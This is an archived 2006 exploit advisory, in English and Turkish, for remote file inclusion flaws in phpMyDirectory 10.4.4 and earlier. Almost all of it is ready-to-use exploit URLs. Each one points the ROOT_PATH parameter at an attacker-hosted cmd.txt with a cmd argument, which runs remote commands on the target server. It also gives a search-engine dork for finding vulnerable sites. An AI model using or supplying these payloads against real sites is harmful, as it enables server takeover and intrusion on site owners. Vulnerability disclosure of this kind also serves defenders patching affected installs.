Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12792
HistoryMay 25, 2006 - 12:00 a.m.

phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)

2006-05-2500:00:00
vulners.com
9

ENGLISH

Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities

Dork : "powered by phpmydirectory"

Author : ajann

greetz : Nukedx,TheHacker

Exploit;

http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

SOME;

http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

ajann,Turkey

TURKISH

Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File Include Vulnerabilities

Sözcük[Arama] : "powered by phpmydirectory"

Açığı Bulan : ajann

greetz : Nukedx,TheHacker

Açık bulunan dosyalar;

http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

SOME;

http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls

Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol açmaktadır.Bu sayede
uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.

Thanks.